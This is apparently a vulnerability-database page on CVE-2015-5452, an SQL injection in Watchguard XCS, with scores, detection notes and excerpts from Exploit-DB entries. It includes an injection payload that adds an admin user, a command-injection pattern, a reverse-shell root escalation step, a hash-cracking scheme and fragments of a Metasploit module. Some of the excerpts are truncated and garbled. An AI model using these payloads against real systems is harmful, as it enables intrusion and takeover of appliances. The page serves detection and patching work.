CVE-2015-5452
published 2015-07-08CVE-2015-5452: SQL injection vulnerability in Watchguard XCS 9.2 and 10.0 before build 150522 allows remote attackers to execute arbitrary SQL commands via the sid cookie, as…
PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.42%
87.4th percentile
SQL injection vulnerability in Watchguard XCS 9.2 and 10.0 before build 150522 allows remote attackers to execute arbitrary SQL commands via the sid cookie, as demonstrated by a request to borderpost/imp/compose.php3.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| watchguard | xcs | — | — |
| watchguard | xcs | — | — |
Detection & IOCsextracted from sources · hover to see the quote
cookiesid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--↗
- →Detect SQLi exploitation attempts via the 'sid' cookie on /borderpost/imp/compose.php3 — look for SQL metacharacters (single quote, semicolon, INSERT, --) in the sid cookie value. ↗
- →A vulnerable host will return the string 'unterminated quoted string' in the HTTP response body when probed with sid=1' — use this as a fingerprint for the check. ↗
- →Detect command injection exploitation via GET requests to /ADMIN/mailqueue.spl with the 'id' parameter containing a leading semicolon (e.g., id=;id or id=;/usr/local/sbin/curl). ↗
- →Successful command injection as 'nobody' (uid=65534) can be confirmed by the string 'uid=65534' appearing in the HTTP response body. ↗
- →Monitor for outbound curl requests from the appliance to external hosts (curl -k) followed by chmod +x and execution of a binary dropped in /tmp — indicative of payload delivery stage. ↗
- →Alert on INSERT SQL statements injected into the sid cookie targeting the sds_users table, particularly inserting a user with priv_level='server_admin'. ↗
- →The XCS password hash uses a known salting scheme: MD5('BorderWare ' + password + ' some other random (9) stuff'), then MD5(password + first_hash). Detect or crack hashes using this scheme. ↗
- ·The exploit requires SSL (HTTPS on port 443) to communicate with the target appliance. ↗
- ·The Metasploit module targets a 64-bit BSD platform (ARCH_X86_64); payload must be a native BSD payload or generation will fail. ↗
- ·The command injection executes as the 'nobody' user (uid=65534), not root — privilege escalation is a separate step (e.g., via cron job running /tmp/revshell as root). ↗
- ·The fix is Build 150522; only Watchguard XCS versions 9.2 and 10.0 prior to this build are affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Watchguard XCS - Remote Command Execution (Metasploit)
exploitdb·2015-09-28
CVE-2015-5453 Watchguard XCS - Remote Command Execution (Metasploit)
Watchguard XCS - Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'Watchguard XCS Remote Command Execution',
'Description' => %q{
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
remote attacker may insert a valid web user into the appliance database, and get access
to the web interface. On the other hand, a vulnerability in the web interface allows the
attacker to inject operating system commands as the 'nobody' user.
},
'Author' =>
[
'Daniel Jensen ' # discovery and Metasploit module
],
'License'
Exploit-DB
Watchguard XCS 10.0 - Multiple Vulnerabilities
exploitdb·2015-06-30
CVE-2015-5452 Watchguard XCS 10.0 - Multiple Vulnerabilities
Watchguard XCS 10.0 - Multiple Vulnerabilities
---
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Watchguard XCS Multiple Vulnerabilities
Affected versions: Watchguard XCS /var/tmp/badqids
The executable "/tmp/revshell" will be executed within three minutes by
the root user.
+----------+
| Solution |
+----------+
Apply the relevant XCS security hotfix (Build 150522) as provided by
Watchguard.
+-------------------+
|Disclosure Timeline|
+-------------------+
12/05/2015 - Email sent to confirm vendor security contact address is valid.
13/05/2015 - Response from vendor confirming address is valid.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/132498/Watchguard-XCS-10.0-SQL-Injection-Command-Execution.htmlhttp://packetstormsecurity.com/files/133721/Watchguard-XCS-Remote-Command-Execution.htmlhttp://www.rapid7.com/db/modules/exploit/freebsd/http/watchguard_cmd_exechttp://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdfhttp://www.securityfocus.com/bid/75516http://www.watchguard.com/support/release-notes/xcs/10/en-US/EN_Release_Notes_XCS_v10_0_Security_Hotfix/EN_Release_Notes_XCS_v10_0_Security_Hotfix.pdfhttp://www.watchguard.com/support/release-notes/xcs/9/en-US/EN_ReleaseNotes_XCS_9_2_Security_Hotfix/EN_Release_Notes_XCS_v9_2_Security_Hotfix.pdfhttps://www.exploit-db.com/exploits/38346/http://packetstormsecurity.com/files/132498/Watchguard-XCS-10.0-SQL-Injection-Command-Execution.htmlhttp://packetstormsecurity.com/files/133721/Watchguard-XCS-Remote-Command-Execution.htmlhttp://www.rapid7.com/db/modules/exploit/freebsd/http/watchguard_cmd_exechttp://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdfhttp://www.securityfocus.com/bid/75516http://www.watchguard.com/support/release-notes/xcs/10/en-US/EN_Release_Notes_XCS_v10_0_Security_Hotfix/EN_Release_Notes_XCS_v10_0_Security_Hotfix.pdfhttp://www.watchguard.com/support/release-notes/xcs/9/en-US/EN_ReleaseNotes_XCS_9_2_Security_Hotfix/EN_Release_Notes_XCS_v9_2_Security_Hotfix.pdfhttps://www.exploit-db.com/exploits/38346/
2015-07-08
Published